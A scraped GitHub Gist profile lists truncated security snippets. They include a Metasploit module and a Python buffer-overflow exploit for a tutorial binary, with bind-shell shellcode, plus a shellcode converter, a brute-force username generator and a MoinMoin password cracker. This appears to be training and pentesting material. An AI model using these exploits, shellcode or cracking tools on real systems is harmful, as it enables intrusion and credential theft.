Skip to content

Instantly share code, notes, and snippets.

Avatar

Harold Rodriguez superkojiman

View GitHub Profile
@superkojiman
superkojiman / serverstrcpy.rb
Created Oct 31, 2016
Metasploit module for Server-Strcpy.exe in the Introduction to Pivoting series
View serverstrcpy.rb
# Server-Strcpy.exe exploit by superkojiman
# http://blog.techorganic.com
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::Tcp
@superkojiman
superkojiman / serverstrcpy.py
Created Oct 31, 2016
Exploit for Server-Strcpy.exe in the Introduction to Pivoting series.
View serverstrcpy.py
#!/usr/bin/env python
# Server-Strcpy.exe exploit by superkojiman
# http://blog.techorganic.com
import socket, sys
def main(target, port):
# 368 bytes, opens a bind TCP shell on port 4444
shellcode = (
"\xd9\xcc\xd9\x74\x24\xf4\x5b\xba\x69\xe4\x4d\x67\x33\xc9" +
@superkojiman
superkojiman / soocat.sh
Created Jun 10, 2016
Quick function to run a binary under socat
View soocat.sh
# Add to .bashrc
# You're welcome
function soocat {
socat tcp-l:${2},reuseaddr,fork EXEC:${1}
}
@superkojiman
superkojiman / README.md
Last active Nov 1, 2020
64-bit binaries for ROP Primer
View README.md

This repository contains the binaries used in my 64-bit ROP Primer writeup.

View keybase.md

Keybase proof

I hereby claim:

  • I am superkojiman on github.
  • I am superkojiman (https://keybase.io/superkojiman) on keybase.
  • I have a public key whose fingerprint is 3930 5291 0B28 1ABF 7AAD 635C FB70 83F9 0D48 6211

To claim this, I am signing this object:

@superkojiman
superkojiman / bin2sc.py
Created Apr 22, 2014
Convert bin to shellcode.
View bin2sc.py
#!/usr/bin/env python
import sys
if __name__ == "__main__":
if len(sys.argv) < 2:
print "usage: %s file.bin\n" % (sys.argv[0],)
sys.exit(0)
shellcode = "\""
ctr = 1
maxlen = 15
@superkojiman
superkojiman / namemash.py
Last active Sep 17, 2021
Creating a user name list for brute force attacks.
View namemash.py
#!/usr/bin/env python
import sys
import os.path
if __name__ == "__main__":
if len(sys.argv) != 2:
print("usage: {} names.txt".format((sys.argv[0])))
sys.exit(0)
if not os.path.exists(sys.argv[1]):
@superkojiman
superkojiman / moincrack.py
Created Apr 19, 2014
Crack MoinMoin Wiki passwords
View moincrack.py
#!/usr/bin/env python -Wignore::DeprecationWarning
import sha, base64, traceback, sys
if len(sys.argv) < 3:
print "usage: %s [user_password_list] [wordlist]" % (sys.argv[0])
sys.exit(0)
try:
for line in open(sys.argv[1], "r"):
a = line.strip().split(":")
@superkojiman
superkojiman / getgenre
Created Apr 16, 2014
Get band's musical genre from Wikipedia
View getgenre
#!/usr/bin/env python
import sys
import plistlib
import urllib2
import re
GENRE_LINE = '<a href="http://www.blogger.com/wiki/Music_genre" title="Music genre">Genres</a>\n'
URL_PREFIX = 'http://en.wikipedia.org/wiki/Special:Search/'
artist_genre = {}
@superkojiman
superkojiman / whereru
Last active Feb 6, 2017
Get location based on IP address.
View whereru
#!/usr/bin/env python
import getopt
import urllib
import socket
def usage(name):
print 'Usage: %s -i IP' % name
print 'Usage: %s -h hostname' % name
def main(argv=sys.argv):